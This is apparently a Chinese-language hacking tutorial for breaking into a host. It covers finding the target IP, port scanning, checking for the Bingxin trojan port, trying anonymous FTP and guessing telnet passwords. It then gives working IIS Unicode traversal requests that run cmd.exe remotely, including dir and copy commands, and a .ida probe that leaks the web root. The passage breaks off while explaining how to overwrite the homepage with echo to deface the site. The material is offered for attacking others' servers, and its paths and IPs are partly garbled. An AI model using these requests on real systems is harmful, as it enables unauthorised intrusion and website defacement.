电脑如何被人入侵.docVIP

我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。? ???首先我们我们要找一台主机来练手，随便挑吧！(乱说的)一:先在ie里看看吧，做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后，我们应该知道它的ip,很简单，ping它一下就可以了。ping (，看看窗口里有三行回应，其中的22就是ip了（还是胡说的，一个例子）。有人要问，我这里怎么没有。那可能是两个原因:第一，你打错命令了；第二，该主机装了防火墙,禁止ping,不过这种可能很小。知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值 21--ftp 文件传输 23--telnet 远程登陆25-smtp 尽管重要，但似乎没什么可利用的 53--domain 同上 79--finger 用户信息了80--http 看网页，没它不行吧 110--pop 收邮件139--netbios 共享用的，很有利用价值3389--win2000超级终端 好用!! 其实端口有上千种，以上这些最常用 我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。顺便扫一下7626,冰河有也说不准哦.那么我们该如何应对呢？ 若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望 telnet在！好!telnet 22，出现窗口！要密码？看来网管还不是超级白痴,随便猜个，错了，闪人！ 二:一切从基础开始 由于winntsystem32cmd.exe的存在，使远程执行命令变为可能，(假设2有漏洞)在浏览器里输入以下请求: 2/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下， 如果inetpub目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。 如果成功，那么在浏览区可看到如下信息： Directory of C:inetpubscripts 2000-09-28 15:49 〈DIR〉 . 2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆） 是不是有自己机器的感觉了，正点！就是这种感觉！ cmd.exe相当与dos里的，因此，我们可以执行很多命令了！ 2/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir （这个命令同样道理） 大家请注意：/c后面的+，实际上就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下： 2/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe 会dos的朋友一定懂其意义了，不懂的请去看书 . 不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！ 三，实战演练 1，修改主页一般主页位置在c:inetpubwwwroot下，但要是改了路径，就需要找找了。 最方便的方法：在浏览器里输入 2/.ida要是有漏洞，那在浏览器里 便会显示主页路径，这个漏洞存在率很高，自然是我们的首选。 分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。 dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，2首页上 有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入 这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意 实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。 找到了目录，就要对它开刀了！一般默认主页为index.htm,index.html,index.asp, default.htm,defautl.html,default.asp中的一个，现在我们确定2中为index.htm 那么我们就修改它吧！ 最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu c:autoexe.bat就是把 cshu加入autoexec.bat里并删除原有内容，echo cshunice c:autoexec.bat 就是加入cshunice但不删除